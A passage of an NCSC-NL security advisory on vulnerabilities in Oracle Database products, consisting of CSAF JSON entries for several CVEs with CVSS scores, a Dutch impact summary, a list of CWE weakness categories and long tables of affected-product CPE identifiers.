"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-33201.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-33201"
},
{
"cve": "CVE-2023-41105",
"cwe": {
"id": "CWE-158",
"name": "Improper Neutralization of Null Byte or NUL Character"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Null Byte or NUL Character",
"title": "CWE-158"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-41105",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-41105.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-41105"
},
{
"cve": "CVE-2023-46589",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"notes": [
{
"category": "other",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-46589",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-46589.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-46589"
},
{
"cve": "CVE-2023-47627",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"notes": [
{
"category": "other",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-47627",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-47627.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-47627"
}
]
}
NCSC-2024-0411
Vulnerability from csaf_ncscnl - Published: 2024-10-17 13:15 - Updated: 2024-10-17 13:15Summary
Kwetsbaarheden verholpen in Oracle Database producten
Notes
The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:
NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.
NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.
This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.
Feiten: Oracle heeft kwetsbaarheden verholpen in diverse Database producten en subsystemen, zoals de Core database, Application Express, Autonomous Health Framework, Essbase, GoldenGate, SQL Developer en Secure Backup.
Interpretaties: Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorieën schade:
- Denial-of-Service (DoS)
- Manipuleren van data
- Toegang tot gevoelige gegevens
Oplossingen: Oracle heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.
Kans: medium
Schade: high
CWE-130: Improper Handling of Length Parameter Inconsistency
CWE-208: Observable Timing Discrepancy
CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
CWE-755: Improper Handling of Exceptional Conditions
CWE-834: Excessive Iteration
CWE-407: Inefficient Algorithmic Complexity
CWE-178: Improper Handling of Case Sensitivity
CWE-732: Incorrect Permission Assignment for Critical Resource
CWE-415: Double Free
CWE-311: Missing Encryption of Sensitive Data
CWE-427: Uncontrolled Search Path Element
CWE-172: Encoding Error
CWE-680: Integer Overflow to Buffer Overflow
CWE-426: Untrusted Search Path
CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')
CWE-116: Improper Encoding or Escaping of Output
CWE-345: Insufficient Verification of Data Authenticity
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-203: Observable Discrepancy
CWE-190: Integer Overflow or Wraparound
CWE-552: Files or Directories Accessible to External Parties
CWE-639: Authorization Bypass Through User-Controlled Key
CWE-125: Out-of-bounds Read
CWE-404: Improper Resource Shutdown or Release
CWE-275: CWE-275
CWE-284: Improper Access Control
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CWE-1333: Inefficient Regular Expression Complexity
CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CWE-416: Use After Free
CWE-401: Missing Release of Memory after Effective Lifetime
CWE-476: NULL Pointer Dereference
CWE-295: Improper Certificate Validation
CWE-668: Exposure of Resource to Wrong Sphere
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
CWE-400: Uncontrolled Resource Consumption
CWE-770: Allocation of Resources Without Limits or Throttling
CWE-502: Deserialization of Untrusted Data
CWE-918: Server-Side Request Forgery (SSRF)
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-787: Out-of-bounds Write
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CWE-122: Heap-based Buffer Overflow
CWE-121: Stack-based Buffer Overflow
CWE-681: Incorrect Conversion between Numeric Types
CWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')
CWE-269: Improper Privilege Management
CWE-20: Improper Input Validation
CWE-87: Improper Neutralization of Alternate XSS Syntax
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-18: CWE-18
CWE-385: Covert Timing Channel
CWE-606: Unchecked Input for Loop Condition
CWE-192: Integer Coercion Error
CWE-390: Detection of Error Condition Without Action
CWE-1325: Improperly Controlled Sequential Memory Allocation
CWE-222: Truncation of Security-relevant Information
CWE-131: Incorrect Calculation of Buffer Size
CWE-59: Improper Link Resolution Before File Access ('Link Following')
CWE-304: Missing Critical Step in Authentication
CWE-502
- Deserialization of Untrusted Data
Affected products
Known affected
48 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
oracle_sql_developer
oracle
|
cpe:2.3:a:oracle:oracle_sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
49 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:*:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.3:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:19c:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:19c:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:21c:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:_security_and_provisioning___21.3:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
8.8 (High)
Affected products
Known affected
61 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
oracle
|
cpe:2.3:a:oracle:application_express_administration:*:*:*:*:*:*:*:*
|
— | |
|
application_express_customers_plugin
oracle
|
cpe:2.3:a:oracle:application_express_customers_plugin:*:*:*:*:*:*:*:*
|
— | |
|
application_express_team_calendar_plugin
oracle
|
cpe:2.3:a:oracle:application_express_team_calendar_plugin:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:19.5.33:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:20.3.28:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:21.2.55:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:22.3.26:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4.3.0.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.4:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:fusion_middleware_12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.3:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
oracle_goldengate_studio
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_studio:*:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:19c:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:19.1.0.0.0-19.1.0.0.9:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
25 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.0.0.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data
oracle
|
cpe:2.3:a:oracle:goldengate_big_data:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
application_express_administration
